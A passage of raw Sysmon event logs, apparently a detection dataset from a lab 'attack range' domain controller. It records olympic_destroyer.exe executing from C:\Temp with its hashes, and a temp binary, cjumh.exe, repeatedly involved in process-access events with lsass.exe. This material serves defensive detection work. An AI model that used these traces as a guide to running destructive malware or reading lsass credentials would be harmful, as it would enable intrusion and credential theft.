10:56:38.991{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:38.991{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:38.988{C8EA50B7-F2AD-6215-C000-000000003802}48566756C:\Windows\Explorer.EXE{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a90ff|C:\Windows\System32\windows.storage.dll+a8d75|C:\Windows\System32\windows.storage.dll+a8866|C:\Windows\System32\windows.storage.dll+a9cd8|C:\Windows\System32\windows.storage.dll+a868e|C:\Windows\System32\windows.storage.dll+ab4a5|C:\Windows\System32\windows.storage.dll+ab824|C:\Windows\System32\windows.storage.dll+aae60|C:\Windows\System32\windows.storage.dll+ad68a|C:\Windows\System32\windows.storage.dll+ad442|C:\Windows\System32\SHELL32.dll+3fa6d|C:\Windows\System32\SHELL32.dll+3e606|C:\Windows\System32\SHELL32.dll+80381|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+18cf1c|C:\Windows\System32\SHELL32.dll+18cc73|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:38.762{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe-----"C:\Temp\olympic_destroyer.exe" C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=29E0BD724ECB8C0010325DE0B6F8D473,SHA256=B2CB5068A186B429DDCEF55A642E5597976EEBF9A9D3BFE33956F97D895C2EA9,IMPHASH=FD7200DCD5C0D9D4D277A26D951210AA{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 354300x8000000000000000289976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:36.516{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53559-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:38.326{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83D59A3D3E04CF85B0746781E43E8B21,SHA256=318CE89E29B9B63BA668DD2B7A5C7A9E52DF748F318B0BE1EBDB349F1A41BFE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000290055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.964{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.826{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.826{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.779{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.779{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.779{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.779{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.779{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.779{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.779{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.763{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.763{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.763{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.763{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.760{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.760{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.759{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.759{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.759{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.759{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 